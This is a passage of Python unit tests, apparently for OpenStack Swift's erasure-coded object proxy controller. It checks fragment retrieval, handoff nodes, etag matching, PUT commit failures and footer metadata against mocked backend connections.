req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
# expect a request to all primaries plus one handoff
self.assertEqual(self.replicas() + 1, len(log))
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), self.policy.ec_ndata)
def test_GET_with_duplicate_but_insufficient_frag_indexes(self):
obj1 = self._make_ec_object_stub()
# proxy should ignore duplicated frag indexes and continue search for
# a set of unique indexes, but fails to find one
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj1, 'frag': 0}, # duplicate frag
{'obj': obj1, 'frag': 1},
{'obj': obj1, 'frag': 1}, # duplicate frag
{'obj': obj1, 'frag': 2},
{'obj': obj1, 'frag': 2}, # duplicate frag
{'obj': obj1, 'frag': 3},
{'obj': obj1, 'frag': 3}, # duplicate frag
{'obj': obj1, 'frag': 4},
{'obj': obj1, 'frag': 4}, # duplicate frag
{'obj': obj1, 'frag': 10},
{'obj': obj1, 'frag': 11},
{'obj': obj1, 'frag': 12},
{'obj': obj1, 'frag': 13},
]
# ... and the rests are 404s which is limited by request_count
# (2 * replicas in default) rather than max_extra_requests limitation
# because the retries will be in ResumingGetter if the responses
# are 404s
node_frags += [[]] * (self.replicas() * 2 - len(node_frags))
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
# expect a request to all nodes
self.assertEqual(2 * self.replicas(), len(log))
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), self.policy.ec_ndata - 1)
@patch_policies(with_ec_default=True)
class TestECObjController(ECObjectControllerMixin, unittest.TestCase):
container_info = {
'status': 200,
'read_acl': None,
'write_acl': None,
'sync_key': None,
'versions': None,
'storage_policy': '0',
}
controller_cls = obj.ECObjectController
def _add_frag_index(self, index, headers):
# helper method to add a frag index header to an existing header dict
hdr_name = 'X-Object-Sysmeta-Ec-Frag-Index'
return dict(headers.items() + [(hdr_name, index)])
def test_determine_chunk_destinations(self):
class FakePutter(object):
def __init__(self, index):
self.node_index = index
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
# create a dummy list of putters, check no handoffs
putters = []
for index in range(self.policy.object_ring.replica_count):
putters.append(FakePutter(index))
got = controller._determine_chunk_destinations(putters, self.policy)
expected = {}
for i, p in enumerate(putters):
expected[p] = i
self.assertEqual(got, expected)
# now lets make a handoff at the end
orig_index = putters[-1].node_index = None
putters[-1].node_index = None
got = controller._determine_chunk_destinations(putters, self.policy)
self.assertEqual(got, expected)
putters[-1].node_index = orig_index
# now lets make a handoff at the start
putters[0].node_index = None
got = controller._determine_chunk_destinations(putters, self.policy)
self.assertEqual(got, expected)
putters[0].node_index = 0
# now lets make a handoff in the middle
putters[2].node_index = None
got = controller._determine_chunk_destinations(putters, self.policy)
self.assertEqual(got, expected)
putters[2].node_index = 2
# now lets make all of them handoffs
for index in range(self.policy.object_ring.replica_count):
putters[index].node_index = None
got = controller._determine_chunk_destinations(putters, self.policy)
self.assertEqual(sorted(got), sorted(expected))
def test_GET_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
get_statuses = [200] * self.policy.ec_ndata
get_hdrs = [{'Connection': 'close'}] * self.policy.ec_ndata
with set_http_connect(*get_statuses, headers=get_hdrs):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertIn('Accept-Ranges', resp.headers)
self.assertNotIn('Connection', resp.headers)
def _test_if_match(self, method):
num_responses = self.policy.ec_ndata if method == 'GET' else 1
def _do_test(match_value, backend_status,
etag_is_at='X-Object-Sysmeta-Does-Not-Exist'):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'If-Match': match_value,
'X-Backend-Etag-Is-At': etag_is_at})
get_resp = [backend_status] * num_responses
resp_headers = {'Etag': 'frag_etag',
'X-Object-Sysmeta-Ec-Etag': 'data_etag',
'X-Object-Sysmeta-Alternate-Etag': 'alt_etag'}
with set_http_connect(*get_resp, headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual('data_etag', resp.headers['Etag'])
return resp
# wildcard
resp = _do_test('*', 200)
self.assertEqual(resp.status_int, 200)
# match
resp = _do_test('"data_etag"', 200)
self.assertEqual(resp.status_int, 200)
# no match
resp = _do_test('"frag_etag"', 412)
self.assertEqual(resp.status_int, 412)
# match wildcard against an alternate etag
resp = _do_test('*', 200,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 200)
# match against an alternate etag
resp = _do_test('"alt_etag"', 200,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 200)
# no match against an alternate etag
resp = _do_test('"data_etag"', 412,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 412)
def test_GET_if_match(self):
self._test_if_match('GET')
def test_HEAD_if_match(self):
self._test_if_match('HEAD')
def _test_if_none_match(self, method):
num_responses = self.policy.ec_ndata if method == 'GET' else 1
def _do_test(match_value, backend_status,
etag_is_at='X-Object-Sysmeta-Does-Not-Exist'):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'If-None-Match': match_value,
'X-Backend-Etag-Is-At': etag_is_at})
get_resp = [backend_status] * num_responses
resp_headers = {'Etag': 'frag_etag',
'X-Object-Sysmeta-Ec-Etag': 'data_etag',
'X-Object-Sysmeta-Alternate-Etag': 'alt_etag'}
with set_http_connect(*get_resp, headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual('data_etag', resp.headers['Etag'])
return resp
# wildcard
resp = _do_test('*', 304)
self.assertEqual(resp.status_int, 304)
# match
resp = _do_test('"data_etag"', 304)
self.assertEqual(resp.status_int, 304)
# no match
resp = _do_test('"frag_etag"', 200)
self.assertEqual(resp.status_int, 200)
# match wildcard against an alternate etag
resp = _do_test('*', 304,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 304)
# match against an alternate etag
resp = _do_test('"alt_etag"', 304,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 304)
# no match against an alternate etag
resp = _do_test('"data_etag"', 200,
etag_is_at='X-Object-Sysmeta-Alternate-Etag')
self.assertEqual(resp.status_int, 200)
def test_GET_if_none_match(self):
self._test_if_none_match('GET')
def test_HEAD_if_none_match(self):
self._test_if_none_match('HEAD')
def test_GET_simple_x_newest(self):
req = swift.common.swob.Request.blank('/v1/a/c/o',
headers={'X-Newest': 'true'})
codes = [200] * self.policy.ec_ndata
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
def test_GET_error(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
get_resp = [503] + [200] * self.policy.ec_ndata
with set_http_connect(*get_resp):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
def test_GET_with_body(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
# turn a real body into fragments
segment_size = self.policy.ec_segment_size
real_body = ('asdf' * segment_size)[:-10]
# split it up into chunks
chunks = [real_body[x:x + segment_size]
for x in range(0, len(real_body), segment_size)]
fragment_payloads = []
for chunk in chunks:
fragments = self.policy.pyeclib_driver.encode(chunk)
if not fragments:
break
fragment_payloads.append(
fragments * self.policy.ec_duplication_factor)
# sanity
sanity_body = ''
for fragment_payload in fragment_payloads:
sanity_body += self.policy.pyeclib_driver.decode(
fragment_payload)
self.assertEqual(len(real_body), len(sanity_body))
self.assertEqual(real_body, sanity_body)
# list(zip(...)) for py3 compatibility (zip is lazy there)
node_fragments = list(zip(*fragment_payloads))
self.assertEqual(len(node_fragments), self.replicas()) # sanity
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))}
responses = [(200, ''.join(node_fragments[i]), headers)
for i in range(POLICIES.default.ec_ndata)]
status_codes, body_iter, headers = zip(*responses)
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(len(real_body), len(resp.body))
self.assertEqual(real_body, resp.body)
def test_PUT_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_with_body_and_bad_etag(self):
segment_size = self.policy.ec_segment_size
test_body = ('asdf' * segment_size)[:-10]
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
conns = []
def capture_expect(conn):
# stash the backend connection so we can verify that it is closed
# (no data will be sent)
conns.append(conn)
# send a bad etag in the request headers
headers = {'Etag': 'bad etag'}
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', headers=headers, body=test_body)
with set_http_connect(*codes, expect_headers=expect_headers,
give_expect=capture_expect):
resp = req.get_response(self.app)
self.assertEqual(422, resp.status_int)
self.assertEqual(self.replicas(), len(conns))
for conn in conns:
self.assertTrue(conn.closed)
# make the footers callback send a bad Etag footer
footers_callback = make_footers_callback('not the test body')
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', environ=env, body=test_body)
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(422, resp.status_int)
def test_txn_id_logging_ECPUT(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
self.app.logger.txn_id = req.environ['swift.trans_id'] = 'test-txn-id'
codes = [(100, Timeout(), 503, 503)] * self.replicas()
stdout = BytesIO()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers), \
mock.patch('sys.stdout', stdout):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
for line in stdout.getvalue().splitlines():
self.assertIn('test-txn-id', line)
self.assertIn('Trying to get ',
stdout.getvalue())
def test_PUT_with_explicit_commit_status(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [(100, 100, 201)] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_error(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [503] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
def test_PUT_mostly_success(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * self.quorum()
codes += [503] * (self.replicas() - len(codes))
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_error_commit(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [(100, 503, Exception('not used'))] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
def test_PUT_mostly_success_commit(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * self.quorum()
codes += [(100, 503, Exception('not used'))] * (
self.replicas() - len(codes))
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_mostly_error_commit(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [(100, 503, Exception('not used'))] * self.quorum()
if isinstance(self.policy, ECStoragePolicy):
codes *= self.policy.ec_duplication_factor
codes += [201] * (self.replicas() - len(codes))
random.shuffle(codes)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
def test_PUT_commit_timeout(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * (self.replicas() - 1)
codes.append((100, Timeout(), Exception('not used')))
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_commit_exception(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
codes = [201] * (self.replicas() - 1)
codes.append((100, Exception('kaboom!'), Exception('not used')))
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_ec_error_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise IOError('error message')
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 499)
def test_PUT_ec_chunkreadtimeout_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise exceptions.ChunkReadTimeout()
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 408)
def test_PUT_ec_timeout_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise exceptions.Timeout()
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 499)
def test_PUT_ec_exception_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise Exception('exception message')
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 500)
def test_PUT_with_body(self):
segment_size = self.policy.ec_segment_size
test_body = ('asdf' * segment_size)[:-10]
# make the footers callback not include Etag footer so that we can
# verify that the correct EC-calculated Etag is included in footers
# sent to backend
footers_callback = make_footers_callback()
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', environ=env)
etag = md5(test_body).hexdigest()
size = len(test_body)
req.body = test_body
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
resp_headers = {
'Some-Other-Header': 'Four',
'Etag': 'ignored',
}
put_requests = defaultdict(lambda: {'boundary': None, 'chunks': []})
def capture_body(conn, chunk):
put_requests[conn.connection_id]['chunks'].append(chunk)
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
conn_id = kwargs['connection_id']
put_requests[conn_id]['boundary'] = headers[
'X-Backend-Obj-Multipart-Mime-Boundary']
put_requests[conn_id]['backend-content-length'] = headers[
'X-Backend-Obj-Content-Length']
put_requests[conn_id]['x-timestamp'] = headers[
'X-Timestamp']
with set_http_connect(*codes, expect_headers=expect_headers,
give_send=capture_body,
give_connect=capture_headers,
headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
timestamps = {captured_req['x-timestamp']
for captured_req in put_requests.values()}
self.assertEqual(1, len(timestamps), timestamps)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Last-Modified': time.strftime(
"%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(math.ceil(float(timestamps.pop())))),
'Etag': etag,
})
frag_archives = []
for connection_id, info in put_requests.items():
body = unchunk_body(''.join(info['chunks']))
self.assertIsNotNone(info['boundary'],
"didn't get boundary for conn %r" % (
connection_id,))
self.assertTrue(size > int(info['backend-content-length']) > 0,
"invalid backend-content-length for conn %r" % (
connection_id,))
# email.parser.FeedParser doesn't know how to take a multipart
# message and boundary together and parse it; it only knows how
# to take a string, parse the headers, and figure out the
# boundary on its own.
parser = email.parser.FeedParser()
parser.feed(
"Content-Type: multipart/nobodycares; boundary=%s\r\n\r\n" %
info['boundary'])
parser.feed(body)
message = parser.close()
self.assertTrue(message.is_multipart()) # sanity check
mime_parts = message.get_payload()
self.assertEqual(len(mime_parts), 3)
obj_part, footer_part, commit_part = mime_parts
# attach the body to frag_archives list
self.assertEqual(obj_part['X-Document'], 'object body')
frag_archives.append(obj_part.get_payload())
# assert length was correct for this connection
self.assertEqual(int(info['backend-content-length']),
len(frag_archives[-1]))
# assert length was the same for all connections
self.assertEqual(int(info['backend-content-length']),
len(frag_archives[0]))
# validate some footer metadata
self.assertEqual(footer_part['X-Document'], 'object metadata')
footer_metadata = json.loads(footer_part.get_payload())
self.assertTrue(footer_metadata)
expected = {}
# update expected with footers from the callback...
footers_callback(expected)
expected.update({
'X-Object-Sysmeta-Ec-Content-Length': str(size),
'X-Backend-Container-Update-Override-Size': str(size),
'X-Object-Sysmeta-Ec-Etag': etag,
'X-Backend-Container-Update-Override-Etag': etag,
'X-Object-Sysmeta-Ec-Segment-Size': str(segment_size),
'Etag': md5(obj_part.get_payload()).hexdigest()})
for header, value in expected.items():
self.assertEqual(footer_metadata[header], value)
# sanity on commit message
self.assertEqual(commit_part['X-Document'], 'put commit')
self.assertEqual(len(frag_archives), self.replicas())
fragment_size = self.policy.fragment_size
node_payloads = []
for fa in frag_archives:
payload = [fa[x:x + fragment_size]
for x in range(0, len(fa), fragment_size)]
node_payloads.append(payload)
fragment_payloads = zip(*node_payloads)
expected_body = ''
for fragment_payload in fragment_payloads:
self.assertEqual(len(fragment_payload), self.replicas())
if True:
fragment_payload = list(fragment_payload)
expected_body += self.policy.pyeclib_driver.decode(
fragment_payload)
self.assertEqual(len(test_body), len(expected_body))
self.assertEqual(test_body, expected_body)
def test_PUT_with_footers(self):
# verify footers supplied by a footers callback being added to
# trailing metadata
segment_size = self.policy.ec_segment_size
test_body = ('asdf' * segment_size)[:-10]
etag = md5(test_body).hexdigest()
size = len(test_body)
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
resp_headers = {
'Some-Other-Header': 'Four',
'Etag': 'ignored',
}
def do_test(footers_to_add, expect_added):
put_requests = defaultdict(
lambda: {'boundary': None, 'chunks': []})
def capture_body(conn, chunk):
put_requests[conn.connection_id]['chunks'].append(chunk)
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
conn_id = kwargs['connection_id']
put_requests[conn_id]['boundary'] = headers[
'X-Backend-Obj-Multipart-Mime-Boundary']
put_requests[conn_id]['x-timestamp'] = headers[
'X-Timestamp']
def footers_callback(footers):
footers.update(footers_to_add)
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', environ=env, body=test_body)
with set_http_connect(*codes, expect_headers=expect_headers,
give_send=capture_body,
give_connect=capture_headers,
headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
timestamps = {captured_req['x-timestamp']
for captured_req in put_requests.values()}
self.assertEqual(1, len(timestamps), timestamps)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Last-Modified': time.strftime(
"%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(math.ceil(float(timestamps.pop())))),
'Etag': etag,
})
for connection_id, info in put_requests.items():
body = unchunk_body(''.join(info['chunks']))
# email.parser.FeedParser doesn't know how to take a multipart
# message and boundary together and parse it; it only knows how
# to take a string, parse the headers, and figure out the
# boundary on its own.
parser = email.parser.FeedParser()
parser.feed(
"Content-Type: multipart/nobodycares; boundary=%s\r\n\r\n"
% info['boundary'])
parser.feed(body)
message = parser.close()
self.assertTrue(message.is_multipart()) # sanity check
mime_parts = message.get_payload()
self.assertEqual(len(mime_parts), 3)
obj_part, footer_part, commit_part = mime_parts
# validate EC footer metadata - should always be present
self.assertEqual(footer_part['X-Document'], 'object metadata')
footer_metadata = json.loads(footer_part.get_payload())
self.assertIsNotNone(
footer_metadata.pop('X-Object-Sysmeta-Ec-Frag-Index'))
expected = {
'X-Object-Sysmeta-Ec-Scheme':
self.policy.ec_scheme_description,
'X-Object-Sysmeta-Ec-Content-Length': str(size),
'X-Object-Sysmeta-Ec-Etag': etag,
'X-Object-Sysmeta-Ec-Segment-Size': str(segment_size),
'Etag': md5(obj_part.get_payload()).hexdigest()}
expected.update(expect_added)
for header, value in expected.items():
self.assertIn(header, footer_metadata)
self.assertEqual(value, footer_metadata[header])
footer_metadata.pop(header)
self.assertFalse(footer_metadata)
# sanity check - middleware sets no footer, expect EC overrides
footers_to_add = {}
expect_added = {
'X-Backend-Container-Update-Override-Size': str(size),
'X-Backend-Container-Update-Override-Etag': etag}
do_test(footers_to_add, expect_added)
# middleware cannot overwrite any EC sysmeta
footers_to_add = {
'X-Object-Sysmeta-Ec-Content-Length': str(size + 1),
'X-Object-Sysmeta-Ec-Etag': 'other etag',
'X-Object-Sysmeta-Ec-Segment-Size': str(segment_size + 1),
'X-Object-Sysmeta-Ec-Unused-But-Reserved': 'ignored'}
do_test(footers_to_add, expect_added)
# middleware can add x-object-sysmeta- headers including
# x-object-sysmeta-container-update-override headers
footers_to_add = {
'X-Object-Sysmeta-Foo': 'bar',
'X-Object-Sysmeta-Container-Update-Override-Size':
str(size + 1),
'X-Object-Sysmeta-Container-Update-Override-Etag': 'other etag',
'X-Object-Sysmeta-Container-Update-Override-Ping': 'pong'
}
expect_added.update(footers_to_add)
do_test(footers_to_add, expect_added)
# middleware can also overwrite x-backend-container-update-override
# headers
override_footers = {
'X-Backend-Container-Update-Override-Wham': 'bam',
'X-Backend-Container-Update-Override-Size': str(size + 2),
'X-Backend-Container-Update-Override-Etag': 'another etag'}
footers_to_add.update(override_footers)
expect_added.update(override_footers)
do_test(footers_to_add, expect_added)
def test_PUT_old_obj_server(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body='')
responses = [
# one server will response 100-continue but not include the
# needful expect headers and the connection will be dropped
((100, Exception('not used')), {}),
] + [
# and pleanty of successful responses too
(201, {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes',
}),
] * self.replicas()
random.shuffle(responses)
if responses[-1][0] != 201:
# whoops, stupid random
responses = responses[1:] + [responses[0]]
codes, expect_headers = zip(*responses)
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_GET_with_frags_swapped_around(self):
segment_size = self.policy.ec_segment_size
test_data = ('test' * segment_size)[:-657]
etag = md5(test_data).hexdigest()
ec_archive_bodies = self._make_ec_archive_bodies(test_data)
_part, primary_nodes = self.obj_ring.get_nodes('a', 'c', 'o')
node_key = lambda n: (n['ip'], n['port'])
backend_index = self.policy.get_backend_index
ts = self._ts_iter.next()
response_map = {
node_key(n): StubResponse(
200, ec_archive_bodies[backend_index(i)], {
'X-Object-Sysmeta-Ec-Content-Length': len(test_data),
'X-Object-Sysmeta-Ec-Etag': etag,
'X-Object-Sysmeta-Ec-Frag-Index': backend_index(i),
'X-Timestamp': ts.normal,
'X-Backend-Timestamp': ts.internal
}) for i, n in enumerate(primary_nodes)
}
# swap a parity response into a data node
data_node = random.choice(primary_nodes[:self.policy.ec_ndata])
parity_node = random.choice(
primary_nodes[
self.policy.ec_ndata:self.policy.ec_n_unique_fragments])
(response_map[node_key(data_node)],
response_map[node_key(parity_node)]) = \
(response_map[node_key(parity_node)],
response_map[node_key(data_node)])
def get_response(req):
req_key = (req['ip'], req['port'])
return response_map.pop(req_key)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(get_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(len(log), self.policy.ec_ndata)
self.assertEqual(len(response_map),
len(primary_nodes) - self.policy.ec_ndata)
def test_GET_with_no_success(self):
node_frags = [[]] * 28 # no frags on any node
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
self.assertEqual(len(log), 2 * self.replicas())
def test_GET_with_only_handoffs(self):
obj1 = self._make_ec_object_stub()
node_frags = [[]] * self.replicas() # all primaries missing
node_frags = node_frags + [ # handoffs
{'obj': obj1, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj1, 'frag': 7},
{'obj': obj1, 'frag': 8},
{'obj': obj1, 'frag': 9},
{'obj': obj1, 'frag': 10}, # parity
{'obj': obj1, 'frag': 11}, # parity
{'obj': obj1, 'frag': 12}, # parity
{'obj': obj1, 'frag': 13}, # parity
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj1['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj1['etag'])
collected_responses = defaultdict(list)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].append(index)
# GETS would be required to all primaries and then ndata handoffs
self.assertEqual(len(log), self.replicas() + self.policy.ec_ndata)
self.assertEqual(2, len(collected_responses))
# 404s
self.assertEqual(self.replicas(), len(collected_responses[None]))
self.assertEqual(self.policy.ec_ndata,
len(collected_responses[obj1['etag']]))
def test_GET_with_single_missed_overwrite_does_not_need_handoff(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
node_frags = [
{'obj': obj2, 'frag': 0},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2}, # missed over write
{'obj': obj2, 'frag': 3},
{'obj': obj2, 'frag': 4},
{'obj': obj2, 'frag': 5},
{'obj': obj2, 'frag': 6},
{'obj': obj2, 'frag': 7},
{'obj': obj2, 'frag': 8},
{'obj': obj2, 'frag': 9},
{'obj': obj2, 'frag': 10}, # parity
{'obj': obj2, 'frag': 11}, # parity
{'obj': obj2, 'frag': 12}, # parity
{'obj': obj2, 'frag': 13}, # parity
# {'obj': obj2, 'frag': 2}, # handoff (not used in this test)
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# because the primary nodes are shuffled, it's possible the proxy
# didn't even notice the missed overwrite frag - but it might have
self.assertLessEqual(len(log), self.policy.ec_ndata + 1)
self.assertLessEqual(len(collected_responses), 2)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_many_missed_overwrite_will_need_handoff(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
node_frags = [
{'obj': obj2, 'frag': 0},
{'obj': obj2, 'frag': 1},
